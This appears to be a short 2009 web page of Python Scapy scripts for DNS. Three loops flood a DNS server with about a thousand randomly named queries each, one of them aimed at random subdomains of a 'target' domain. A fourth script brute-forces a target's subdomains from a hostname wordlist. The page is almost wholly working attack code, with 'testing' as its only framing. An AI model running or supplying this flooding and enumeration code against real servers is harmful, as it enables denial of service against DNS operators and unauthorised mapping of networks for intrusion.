Scapy DNS
Some Scapy Samples for Testing / Flooding DNS Server with random Querys
Full Random Querys
for i in range(0, 1000):
 s = RandString(RandNum(1,50))
 s1 =s.lower()
 d = RandString(RandNum(1,20))
 d1 = d.lower()
 t = RandString(RandNum(2,3))
 t1 = t.lower()
 q = s1+"."+d1+"."+t1
 print i ,q
 send(IP(dst="192.168.0.1")/UDP(sport=RandShort())/DNS(rd=1,qd=DNSQR(qname=q)))
else:
 print 'The for loop is over'
One Domain
top_level = ".ch"
domain = "target"
cnt = 1000
dns_server = "10.0.0.1"

for i in range(0, cnt):
 s = RandString(RandNum(1,8))
 s1 =s.lower()
 q = s1+"."+domain+top_level
 print i ,q
 sr1(IP(dst=dns_server)/UDP(sport=RandShort())/DNS(rd=1,qd=DNSQR(qname=q)))
Some Toplevel Domains
top =[ ".com", ".net" , ".com", ".edu" , ".ch", ".de", ".li", ".jp", ".ru", ".tv",".nl",".fr" ]
anz_top=len(top)

for i in range(0, 100):
 s = RandString(RandNum(1,50))
 s1 =s.lower()
 d = RandString(RandNum(1,20))
 d1 = d.lower()
 t = top_level=top[random.randint(0,anz_top-1)]
 t1 = t.lower()
 q = s1+"."+d1+t1
 print i ,q
 send(IP(dst="192.168.0.1")/UDP(sport=RandShort())/DNS(rd=1,qd=DNSQR(qname=q)))
else:
 print 'The for loop is over'
DNS Enumeration Sample
#!/usr/bin/python
from scapy.all import *
domain = "target.ch"
dns_server = "10.0.0.1"
server =[ "www", "www1" , "www2", "ns", "ns1" , "ns2" ,"dns" , "dns1", "dns2", "dns3", "pop", "mail", "smtp" , 
	"pop3",  "test", "dev" , "ads", "adserver", "adsl", "agent", "channel", "dmz", "sz" , "client", "imap" ,
	"http" , "https", "ftp", "ftpserver", "tftp", "ntp" , "ids" , "ips" , "snort" , "imail" , "pops" , 
        "imaps" , "irc" , "linux" , "windows", "log" , "install", "blog" , "host", "printer", "public" , "sql",
        "mysql", "router" , "cisco" , "switch", "telnet", "voip", "webmin" , "ssh", "delevlop" , "pub" , "root" ,
        "user", "xml", "ww" , "telnet", "extern", "intranet" , "extranet", "testing" , "default", "gateway" ,
        "radius" , "noc" , "mobile", "customer" , "chat" , "siprouter" , "sip" , "nms" , "noc", "office" , 
        "voice" , "support" , "spare" , "owa" , "exchange" ]
serverans=[]
cnt=len(server)

for i in range(0, cnt):
 q = server[i]+"."+domain
 ans=sr1(IP(dst=dns_server)/UDP(sport=RandShort())/DNS(rd=1,qd=DNSQR(qname=q)))
 ans
 if ans[DNS].ancount == 0:
    print q, "unkown"
    serverans.insert(i,"unkown")
 else:
    print q, ans[DNSRR].rdata
    serverans.insert(i,ans[DNSRR].rdata)

for i in range(0, cnt):
  print server[i]+"."+domain, serverans[i]

(c) 2009 by packetlevel.ch / last update: 27.09.2009